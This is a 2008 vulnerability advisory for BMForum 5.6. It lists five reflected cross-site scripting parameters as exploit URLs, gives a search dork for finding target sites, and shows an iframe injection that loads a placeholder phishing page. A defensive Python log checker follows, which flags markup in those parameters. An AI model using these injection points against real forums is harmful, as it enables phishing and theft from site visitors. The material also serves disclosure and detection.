
BMForum Remote 5.6 Multiple XSS Vulnerability






==========================================================
      BMForum Remote 5.6 Multiple XSS Vulnerability
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : 5.6 (Latest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=

--- Note ---
 Especially dangerous when an 'IFRAME' tag is injected through these parameters for phishing.

Example: http://[target]/[BBForum_path]/index.php?outpused= src=http://phisherpage.com width="900" height="600">

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################
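
A log check for the five script/parameter pairs listed above, as an added example that is not part of the original advisory: it flags requests whose decoded values for those parameters contain HTML metacharacters. The combined access-log format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path suffix -> parameters the advisory lists as reflected.
AFFECTED = {
    "/index.php": {"outpused"},
    "/newtem/footer/bsd01footer.php": {"footer_copyright", "verandproname"},
    "/newtem/header/bsd01header.php": {"topads", "myplugin"},
}

# Assumption: combined log format, request field like "GET /path?x=y HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters needed to open a tag or break out of an attribute.
MARKUP_RE = re.compile(r"[<>\"']")

def suspicious_params(log_line):
    """Return [(path, param, decoded_value)] for listed parameters carrying markup."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = url.path.lower()
    params = next((p for sfx, p in AFFECTED.items() if path.endswith(sfx)), None)
    if params is None:
        return []
    hits = []
    # parse_qsl percent-decodes values, so %3Ciframe is inspected as <iframe.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in params and MARKUP_RE.search(value):
            hits.append((url.path, name, value))
    return hits

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2008:10:01:02 +0000] "GET /forum/index.php'
    '?outpused=%3Ciframe%20src%3Dhttp%3A%2F%2Fexample.invalid%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/May/2008:10:01:09 +0000] "GET /forum/newtem/header/'
    'bsd01header.php?topads=hello HTTP/1.1" 200 812',
    '198.51.100.4 - - [22/May/2008:10:02:00 +0000] "GET /forum/index.php'
    '?page=2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for path, name, value in suspicious_params(line):
            print(f"ALERT {path} {name}={value!r}")
```

The character test is a heuristic for triage; the durable fix is to HTML-encode these values before the templates output them.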
 
